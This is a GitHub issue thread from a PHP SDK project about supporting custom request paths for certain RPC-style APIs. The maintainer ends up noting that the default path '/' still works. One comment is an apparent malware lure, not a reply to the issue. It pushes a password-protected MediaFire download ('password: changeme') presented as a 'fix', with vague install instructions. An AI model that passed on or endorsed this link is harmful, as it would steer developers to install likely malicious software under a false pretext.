### ISSUE TITLE
Custom path for RPC style APIs

### ISSUE THREAD

**Issue by lizhineng** [dew-serverless/acs-sdk-php#36]
Not all RPC style API path is `/`, there are some APIs defined in _OOS_ have custom path and we need to support them:

- DeleteTemplates
- DeleteTemplate
- ListExecutionRiskyTasks

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by lizhineng** [comment]
After experimenting with RPC APIs that include the _path_ data field, I've found that sending a request to the service using the path _/_ still functions, despite the API definition specifying the _path_ field.
